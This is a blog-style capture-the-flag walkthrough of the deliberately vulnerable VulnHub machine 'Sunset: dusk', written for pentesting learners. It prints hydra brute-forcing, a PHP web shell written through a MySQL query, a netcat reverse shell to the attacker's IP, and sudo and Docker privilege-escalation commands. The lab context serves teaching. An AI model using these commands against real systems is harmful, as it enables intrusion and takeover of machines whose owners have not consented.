Android Tips and Tricks for Getting the Most from Your Phone
Gone are the days when phones were only used to make phone calls and send text messages; nowadays, smartphones are more akin to a pocket-sized
Sunset: dusk is a vulnerable by design Debian based machine created by whitecrOwz. It is available on https://www.vulnhub.com
This machine is ranked as a beginner VM, so it is very much useful for those pentesting learners who have just started to get hands on practice.
We will take an advantage of the vulnerabilities present in this machine i.e. weak credentials which let us inject the PHP file for exploiting Remote Code Execution.
After importing Sunset: dusk on VirtualBox, start the VM:
As we don’t know the IP address of this VM we will get back to our attacking machine i.e. Kali Linux and use netdiscover command to identify the target machine’s IP
We got the IP of the target machine now, we will perform information gathering by scanning the target IP to identify all the loopholes and open ports of the victim.
Use Nmap tool to scan the target: # nmap 192.168.0.114 -A
From the above results we can see there is a bunch of open ports running the services including ftp, ssh, http and so on.
Let’s target port 3306 to try for mysql brute force attack with the help of hydra using rockyou.txt file (a password dictionary of compromised passwords from the social media application developer RockYou)
# hydra –l root –P /usr/share/wordlists/rockyou.txt.gz 192.168.0.114 mysql
Successfully got the weak credentials of MYSQL (user: root and password: password)
Also redirect towards 192.168.0.114:8080/
This page showing the list of the current directory. Also, there is a hint for writable directory /var/tmp, thus making it easy to exploit the loopholes
The working directory and the credentials for database are in our hands. By using these let’s inject a malicious code as sql query into a PHP file named “ehacking.php”.
This file will proceed a Remote Code Execution.
SQL Query> select “<?php system($_GET[‘cmd’]); ?>“ into outfile ‘/var/tmp/ehacking.php’ ;
There is an entry of our injected file ‘ehacking.php’ at 192.168.0.114:8080
Verify the Remote Code Execution parameters by executing this PHP file:
http://192.168.0.114:8080/ehacking.php?cmd=id
This ensuring we can run system command and send our cmds to the server through this page.
Get back to Kali prompt and type command:
# nc -lvp 1234
Now try to let the server sends us back an nc connection by executing:
http://192.168.0.114:8080/ehacking.php?cmd=nc -e /bin/bash 192.168.0.111 1234
Capturing the first flag (user.txt)
The connection is successfully established.
Find the first flag ‘user.txt’ by going into the directoy /home/dusk and read the data from the user.txt
We have successfully spawned the host machine and captured the first flag!
Capturing the second flag (root.txt)
Now run sudo -l
This showing we can execute the three marked binaries as if we were the local user dusk without using a password for sudo.
To break into the user dusk environment, use these commands:
COMMAND=’/bin/sh’
sudo -u make -s –eval=$’x:\n\t-‘”$COMMAND”
And we successfully got the user dusk environment. We can see from here, Docker is running on the host machine. Let’s use one of Docker privilege escalation routes, to get a root shell
$ docker run –v /:/hostOS –i –t chrisfosterelli/rootplease
This command will fetch the Docker image from the Docker Hub Registry. We have passed three parameters in it i.e.
After getting into the root shell get id and go into root directory where you will find root.txt that is our final flag!
We have successfully captured both the flags. This CTF challenge is very interesting showing how to exploit weak credentials and get the root access.
Industrial Cybersecurity
September 28, 2023
Want always be up to date?
By subscribing to our mailing list, you will be enrolled to receive our new trainings, latest blog posts, product news, and more.
Transform your cybersecurity skills with CIP Cyber’s comprehensive training & course offerings
Gone are the days when phones were only used to make phone calls and send text messages; nowadays, smartphones are more akin to a pocket-sized
Have you heard about the term “test automation” but don’t really know what it is? Well, you’ve come to the right page! Get all your
This article explores the idea of discovering the victim’s location. Previously, we have used several tools for OSINT purposes, so, today let us try this
Want always be up to date?
By subscribing to our mailing list, you will be enrolled to receive our new trainings, latest blog posts, product news, and more.
Transform your cybersecurity skills with CIP Cyber’s comprehensive training & course offerings